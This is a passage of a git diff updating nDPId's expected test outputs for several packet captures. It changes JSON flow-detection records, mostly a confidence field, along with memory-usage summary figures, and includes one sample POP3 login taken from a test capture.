-00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":44,"total-skipped-flows":0,"total-l4-payload-len":26716,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1648373359681} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 44/44 @@ -55,9 +55,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5922065 bytes -~~ total memory freed........: 5922065 bytes -~~ total allocations/frees...: 118224/118224 +~~ total memory allocated....: 6055699 bytes +~~ total memory freed........: 6055699 bytes +~~ total allocations/frees...: 120986/120986 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1313 chars diff --git a/test/results/pop3.pcap.out b/test/results/pop3.pcap.out index b2142fdb2..a2891ac80 100644 --- a/test/results/pop3.pcap.out +++ b/test/results/pop3.pcap.out @@ -4,8 +4,8 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1349776771892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776771892,"pkt":"ABffs8QAAMCfw1sHCABFEAA8\/wtAAEAGdh2P4eW1StAFHInXAG5gksK3AAAAAKACFtDFsQAAAgQFtAQCCAoAYD28AAAAAAEDAwY="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1349776772030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776772030,"pkt":"AMCfw1sHABffs8QACABFAAA8AABAADUGgDlK0AUcj+HltQBuidcdXnV7YJLCuKASFqDzqQAAAgQFtAQCCApTpKX2AGA9vAEDAwk="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1349776772030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1349776772030,"pkt":"ABffs8QAAMCfw1sHCABFEAA0\/wxAAEAGdiSP4eW1StAFHInXAG5gksK4HV51fIAQAFzFqQAAAQEICgBgPkZTpKX2"} -00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} +00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-payload-len":1853,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1349776799209} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872405 bytes -~~ total memory freed........: 5872405 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6006067 bytes +~~ total memory freed........: 6006067 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 822 chars diff --git a/test/results/pops.pcapng.out b/test/results/pops.pcapng.out index 81c3dd0ad..993b715e4 100644 --- a/test/results/pops.pcapng.out +++ b/test/results/pops.pcapng.out @@ -4,8 +4,8 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938117011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117011,"pkt":"AAAAAAAAAAgACwgJCABFAAA0BaxAAH8GIWTAqAABCgoKAdclA+N8RI7kAAAAAIACIACU+AAAAgQE7AEDAwIBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938117270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117270,"pkt":"AAAAAAAAAAgACwgJCABFAAA0AABAADMGcxAKCgoBwKgAAQPj1yVpzHIcfESO5YASchBmIQAAAgQFtAEBBAIBAwMH"} 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938117298,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1614938117298,"pkt":"AAAAAAAAAAgACwgJCABFAADgBbBAAH8GILTAqAABCgoKAdclA+N8RI7lacxyHVAYQTecFQAAFgMDALMBAACvAwNgQf\/5kgLNNRPYdtFiHEoPzfeU37\/0FcJ+JWxvuPQRAgAAOMAowCfAFMATAJ8AngA5ADMAnQCcAD0APAA1AC\/ALMArwCTAI8AKwAkAagBAADgAMgAKABMABQAEAQAATgAAABkAFwAAFHBvcC5zZWN1cmVzZXJ2ZXIubmV0AAoABgAEABcAGAALAAIBAAANABQAEgYBBgMEAQUBAgEEAwUDAgMCAgAXAAD\/AQABAA=="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":2704,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938117559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871644 bytes -~~ total memory freed........: 5871644 bytes -~~ total allocations/frees...: 118121/118121 +~~ total memory allocated....: 6005278 bytes +~~ total memory freed........: 6005278 bytes +~~ total allocations/frees...: 120883/120883 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 809 chars diff --git a/test/results/pps.pcap.out b/test/results/pps.pcap.out index 86ab59c52..afd9c8ef4 100644 --- a/test/results/pps.pcap.out +++ b/test/results/pps.pcap.out @@ -123,380 +123,380 @@ 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":921,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136439,"flow_last_seen":1467353136900,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":8362,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1467353136900,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 